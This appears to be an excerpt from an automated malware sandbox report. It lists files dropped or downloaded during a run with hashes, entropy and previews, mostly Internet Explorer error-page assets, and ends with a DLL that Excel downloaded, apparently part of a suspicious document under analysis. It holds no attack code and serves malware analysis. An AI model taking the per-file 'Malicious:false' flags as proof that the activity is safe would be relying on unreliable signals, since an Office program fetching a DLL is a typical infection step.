                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/bullet.png
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\errorPageStrings[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4720
                                                                                                                                                                Entropy (8bit):5.164796203267696
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):886272
                                                                                                                                                                Entropy (8bit):5.674513513570937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
